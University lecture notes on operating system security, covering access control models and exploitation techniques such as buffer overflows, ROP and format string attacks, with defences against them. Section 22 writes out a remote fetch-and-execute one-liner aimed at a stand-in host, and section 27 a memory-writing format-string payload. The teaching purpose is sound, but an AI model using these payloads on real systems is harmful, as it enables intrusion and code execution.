Realtime and Operating Systems

08:15-10:00 Thursday October 12th, 2017

Security Part I


Table of Contents
Access Matrices
Exploitation by Primitives
Security Models

1. Introduction

  • We look at the security aspects of operating systems over 1.5 lectures.
  • Starting with a high-level view:
    • Desirable properties / goals.
    • Security models.
    • Protection Mechanisms.
  • To understand how to secure a system, we must look at how to attack it.
    • Common exploit techniques for software.
    • Defences against them.

2. Goals and Threats

Confidentiality
Secret information: not allowing exposure (leaking).
Integrity
No unauthorised changes to data; allows/requires trust.
Availability
Keeping the system operational, and available for access.
  • First three properties are the classic InfoSec definition.
  • Maintaining these properties normally relies on a fourth property.
Authentication
Knowing which user initiated an action.
  • Knowing who to blame is often critical.
  • Ruling out impersonation is a basic defence against many attacks.

3. The Other Team

  • Once upon a time the world was an open and trusting place.
    • Passwords were largely optional (guest accounts!).
    • It was assumed that other people would be responsible.
  • Then the rest of the world was connected.
    • Now the basic assumption is the internet is the "wild west".
    • Data point: in 2008 the average time to own an XP box was 4 minutes.
  • The general trend is more organised and sophisticated attackers.
    • Pwning machines has become big "business".
    • Many not-so-legal ways to turn other people's computers into money:
      • Industrial espionage, spam, money laundering, ransom demands...
  • We have to assume the other team is well-funded, highly-trained and informed.

4. How to build secure systems

  • Get rid of the users.
    • They choose stupid passwords and click on bad links.
  • Get rid of network access.
    • There are always bugs in code, avoid remote execution vulnerabilities.
  • Get rid of physical access.
    • Cannot secure against a local attacker.
  • Get rid of privileged servers.
    • If they are exploited the system is wide open.
  • It is much simpler to just turn the system off.
    • Anything useful it can do is an entry vector.
    • Example: putting useful functions into standard libraries (printf).

5. Protection

  • Object: any resource in the computer that has restricted access.
    • e.g. files, memory pages, processes, hardware devices etc.
    • Fixed set of operations (API).
    • Unique naming scheme (need to identify each object).
  • Domains model a group of users with the same level of privilege.
    • e.g. workers, secretaries, CEOs (in increasing order of privilege).
    • UNIX: users (UIDs) in groups (GIDs): slightly finer grain.
    • A list of allowed operations for each object.

6. Domains and Objects

  • Easy to express as a matrix: objects vs domains.
  • Each cell shows access rights for domain on object.
  • Can also include domains with matrix: models change of domain.
    • e.g. UNIX gives sudo rights to users in the wheel group.
Principle of Least Authority
Do not grant more access rights than are required.
  • The most secure system is a minimum solution.
  • If people have rights they do not need then the attack surface for the system is larger.

7. Access Control Lists

  • Protection matrix is very large, and mostly empty (sparse).
  • Options: list of list, either row-wise (by domain) or column-wise (by object).
  • Column-wise approach: Access Control List - each object contains a specific list of domains (e.g. users) and allowed actions.
    • In the example: each process is owned by a user, each entry in the ACL is an allowed user/action pair.
    • This is a whitelisting approach - anything not listed is not allowed.
  • In systems that put users in groups there are several different options...

8. Access Control Lists: groups

Mutually exclusive roles
Treat membership of a group as a mutually exclusive choice.
  • So when user X is in groups A and B, choose role (X,A) or (X,B).
    • Stronger protection model, finer grained model of access.
    • Switching roles is explicit (e.g. logout/login): more work for the user.
  • Wildcards: all users in a group *,adm, all groups a user has bob,* or everyone *,*.
Always in all groups
The UNIX approach: a user has the access rights of all of their groups.
  • Coarser-grain security model: c.f. Principle of Least Authority.
  • Using an ordered list for ACL allows expression of exclusions.
    • e.g. virgil,*: none; *,*: RW (sucks to be virgil).

9. Capabilities

  • We may also store the sparse protection matrix by rows, rather than columns: a list per process.
  • Each item in the list is an object (e.g. a file) and its access rights.
  • Although capabilities are associated with processes - the process must not be allowed to modify its own capabilities (privilege escalation).
  • Three approaches have been explored:
Hardware support
Add a tag to every word - indicates non-modifiable data, can propagate through operations.

10. Capabilities

C-list managed by kernel
Add a list of capabilities to the privileged Process Control Block
  • Straightforward approach - only requires software.
  • Only works locally, cannot be used if the process is on a remote machine.
Cryptographic protection
Add a secret value to the inode, use a secure hash to guard the capability.
  • Use a one-way function (hash) on the capability and secret.
    • Similar approach to using a MAC.
  • Can give the untrusted data (access rights) to an untrusted process.
  • Cannot be altered without:
    • Knowing the secret (kept on the server).
    • Breaking the hash.

11. Bell-LaPadula

  • Security model for modelling the flow of sensitive information.
  • Security levels are global in the system, e.g. Unclassified, Confidential, Secret, Top-Secret.
  • Higher numbered levels have access to more confidential information.
  • Basic idea: write upwards, read downwards: level k may read levels \(\leq k\) and write levels \(\geq k\).
  • Prevents leaking of information to users without clearance.
  • Implementation: store security level for each UID, given to login process and inherited by each spawned process in the tree.
  • Hook the open() call and check it against the security levels of the user and the file.

12. Biba

  • Bell-LaPadula models secrecy, not integrity.
    • Typical corporate organisation operates the other way around.
    • Levels indicate authority, not access to secret information.
Biba Model
Level k can only read levels \(\geq k\) and write levels \(\leq k\).
  • Exactly opposite to the Bell-LaPadula model.
    • Choose either secrecy or integrity - they are mutually exclusive.
    • Intuitively: to trust validity we need to know the source, and vice versa.

13. Covert Channels

  • A covert channel allows one process to pass information to another.
    • Without using OS provided communication channels.
    • Subverts the system security model: breaks integrity/secrecy.
  • Example shows three processes on a shared system.
    • Assume some security model, e.g. Bell-LaPadula: server handles confidential information on behalf of client, should not leak it.
    • Security model does not allow it to connect to anyone else.
    • Is it possible to guarantee the model is accurate?

14. Covert Channels

  • Communication is a shared understanding of a pattern.
    • When a program executes there is a lot of observable behaviour.
    • Side effects: cache state, I/O load, memory contention, CPU utilization, resource locking, steganography...
    • A collaborator process can observe one of these, so information can be transmitted.
    • If the channel is lossy - use an error correcting code.
    • Very difficult to detect or prevent: lots of examples.

Break (15mins)


15. Exploiting Software

  • "You can be sure of succeeding in your attacks if you only attack places which are undefended. You can ensure the safety of your defense if you only hold positions that cannot be attacked." - Sun Tzu
  • The OS is more than the kernel: large collection of complex programs.
  • Depending on their function, some of these are required to run as root.
  • Attacking the security of a system means finding a way around the security measures built into the kernel.
  • Privilege Escalation: using an exploit against a program running as a privileged user.
    • The idea is to trick the privileged code into performing the attacker's purpose.
  • As specific techniques are discovered, defences are designed, attackers then look for new holes.
    • This creates an arms race between the two sides.

16. Buffer Overflows

  • Much code is written in C / C++.
  • Very low-level languages: no abstraction of memory or of the hardware-provided calling procedure.
  • Arrays are simply pointers - no length information.
  • No bounds checking: writing to an index outside of the array corrupts memory.
  • No semantic difference to the second version, but programmers "expect" arrays to work differently.
  • In both cases gets() receives a raw pointer, and starts filling memory with input...
void getMessage() {
    char buffer[128];
    printf("Enter Message:\n");
    gets(buffer);
    writeLog(buffer);
}

void getMessage() {
    char *buffer = malloc(128);
    printf("Enter Message:\n");
    gets(buffer);
    writeLog(buffer);
}

17. Buffer Overflows

  • a) shows the stack before getMessage() [called A in the text].
  • b) shows the creation of getMessage stack frame.
    • &buffer[128] == &return address
  • c) shows the entry of more than 128 bytes by the user.
  • When the getMessage procedure exits, the program will return to an address of the attacker's choice.

18. Buffer Overflows

  • So what is a useful return address?
  • If we run the program in a debugger we can see where the stack ends up when getMessage() is called.
  • If we get the program to repeat the same series of steps during another execution, the stack pointer will be the same.
  • So we can work out the address of the buffer we are filling...
  • If we input a sequence of bytes with code, and overwrite the return address we can execute the code.
  • If we can't replicate the call sequence exactly: NOP sled....

19. Heap spraying

  • NOP: no operation, a "dummy" instruction.
  • A sequence of NOP instructions does nothing.
  • But each one takes only a single byte.
  • So jumping to any address in the NOP sled will cause control to pass (eventually) to the first instruction following the sled.
  • An attacker does not need to know the exact address of the target buffer - they can estimate and pad out their data with a NOP sled.
  • Not limited to the stack - can overflow heap buffers.
  • The heap structure and layout is much less predictable than the stack.
  • Heap spraying: write NOP-sled/shellcode as often as possible.

20. Stack Canaries

  • Assume that we ship a product with many buffer overflows.
  • It is a lot of work to find them and fix them all.
  • Perhaps we can be a little lazy?
  • Canaries: little yellow birds that die quickly.
  • Pick a random number each execution.
  • On a function call write it to the stack below the return address.
  • Check the value on return, if it has changed then abort the program.
  • Buffer overflows run upwards through memory.
  • To get to the return address the attack must overwrite the location below.

21. NX Protection

  • Allowing the program to write to a piece of memory and execute it is dangerous.
  • It is also exceptionally useful for code generation: JIT compilers, meta-programming, autotuning, self-modifying code...
  • But bad programmers are the reason we can't have nice things.
  • Avoid allowing RWX access to memory pages.
  • Choose: either executable code, or writable data.
    • W^X (Write XOR Execute).
  • Now shellcode written to the stack/heap cannot be executed.
  • So after seeing a piece of the arms race, have the defenders won?

22. Code Reuse Attacks

  • If we can't inject new code, can we abuse code already in the program?
  • bash -c "$(curl http://badpla.ce/shellode.sh)"
  • Standard C library includes system().
    • This executes a command from inside a program.
    • So if we can pass the above string to system(): game over.
    • system() code is linked into programs that don't use it...
  • Basic idea: overwrite the return address and args for system() call. Use the ret as a call.

23. Return-oriented programming

  • So if we fake a call mechanism on the stack, and use it by a ret...
    • The procedure that we call will eventually return...
    • If we write another fake call sequence we can play again.
  • Return Oriented Programming: build arbitrary sequences of functionality from code in the target program.
  • To do this we just need to search for fragments that we need, followed by return instructions.
  • NX was not a strong enough defence...

24. ASLR

  • ROP relies on knowing target addresses.
  • These must be exact - code cannot be changed, so NOP sleds are impossible.
  • If the attacker doesn't know the address of code they cannot use ROP.
  • Address Space Layout Randomisation (ASLR) puts the code at a different address on each execution.
  • Problem: code uses relative addressing - we must keep the offsets between (order of) procedures the same.
  • Find one address and it can be used to work out the rest.
  • Can't recompile the program on each execution - too expensive.
  • Can put the stack and heap at a random point in the address space.

25. Format String Attacks

  • Programmers forget that the first argument to printf is not a string.
    • It is a format string that controls how to interpret the other arguments on the stack.
  • printf("Hello world\n"); should really be:
  • printf("%s", "Hello world\n");
  • But nobody bothers with the extra detail...
  • When the string to be printed is entered by an attacker:
    • The difference becomes important: printf(input) is dangerous.
    • What happens if the string entered contains %s?
  • But it gets worse...
    • Weird archaic format strings that people forget are buried in libc.
    • %n writes the number of characters printed so far into memory!
    • It almost seems to have been designed to be exploited...

26. Exploitation Mindset (an aside)

  • At first glance it may not seem obvious there is a security hole in unsanitized format strings.
The basic mindset for exploiting software
Can I build a read primitive? A write primitive? An execute primitive?
  • The system will attempt to avoid exposing these to an attacker.
  • Often it will mean repurposing code meant to do something else.
  • The attacker views the code in the system in a strange way:
    • Not a collection of instructions that was designed to do something.
    • But a collection of instructions that does do something.
  • Seeing how things are vs seeing how things should be.
  • Finding the gap between these two views allows exploitation.
  • System designers must also see the world in this way: close the gaps.

27. Format String Attacks

  • Now we look closely at the format string specifiers.
    • %n: writes the number of characters printed so far into a location taken from the stack.
    • %08x: consumes 32 bits of arguments from the stack.
  • So by combining these we can walk up the stack, and then write into a memory location.
    • %08x %08x %08x %n walks 12 bytes up the stack and uses the next 4 bytes as a pointer.
  • How can we choose the memory location?
    • The fmt-string itself is in a caller's frame.
    • Can also embed the address in the input.

28. A short interlude

  • Not so much of a summary as a brief interlude.
  • We will pick up here with more discussion of attack and defence in the context of software exploitation in the next lecture.